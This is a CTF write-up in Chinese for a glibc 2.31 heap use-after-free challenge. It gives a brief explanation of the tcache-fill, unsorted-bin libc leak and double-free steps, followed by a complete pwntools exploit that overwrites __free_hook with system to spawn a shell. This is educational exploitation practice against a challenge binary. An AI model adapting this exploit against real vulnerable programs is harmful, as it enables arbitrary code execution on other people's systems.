存在UAF,glibc-2.31版本,存在tcache_key检测。

申请十个chunk,释放前7个填满tcachebin,然后释放第9个进入到unsortedbin中泄露libc。

接着释放第8个chunk,此时会和unsortedbin合并。

申请出tcachebin中的一个chunk,留一个tcachebin的位置利用double_free。

此时再次释放第9个chunk,就会将其释放到tcachebin中。

通过申请一个0x90的chunk,覆盖next指针为free_hook即可

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
# -*- coding: utf-8 -*-
from pwn import *
from ctypes import *
from libcfind import *
from LibcSearcher import *
import base64
import sys
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
debug = 1
if debug:
p = process('./pwn')
elf = ELF('./pwn')
# p = process('', env={'LD_PRELOAD':'./libc.so'})
# gdb.attach(p)
else:
p = remote('node5.anna.nssctf.cn', 28646)
elf = ELF('./pwn')
# -----------------------------------------------------------------------
s = lambda data: p.send(data)
sa = lambda text, data: p.sendafter(text, data)
sl = lambda data: p.sendline(data)
sla = lambda text, data: p.sendlineafter(text, data)
r = lambda num=4096: p.recv(num)
rl = lambda text: p.recvuntil(text)
pr = lambda num=4096: sys.stdout.write(p.recv(num).decode())
inter = lambda: p.interactive()
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
# -----------------------------------------------------------------------
libc = ELF('./libc-2.31.so')
def add (index,size,content):
rl(b">")
sl(b'1')
rl(b"Index: ")
sl(str(index))
rl(b"Size: ")
sl(str(size))
rl(b"Content: ")
s(content)
def delete(index):
rl(b">")
sl(b'2')
rl(b"Index: ")
sl(str(index))
def show(index):
rl(b">")
sl(b'3')
rl(b"Index: ")
sl(str(index))

gdb.attach(p)
for i in range(10):
add(i,0x80,b'a')
for i in range(7):
delete(i)
delete(8)
show(8)
# rl(b'\n')
libc_leak = uu64()
lg("libc_leak",libc_leak)
libc_base = libc_leak-0x1ecbe0
lg("libc_base",libc_base)
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base+libc.sym['system']
delete(7)
add(10,0x80,b'aa')
delete(8)
add(11,0x10,b'aa')
add(12,0x90,p64(0)*14+p64(free_hook))
add(13,0x80,b'/bin/sh\x00')
add(14,0x80,p64(system))
delete(13)

inter()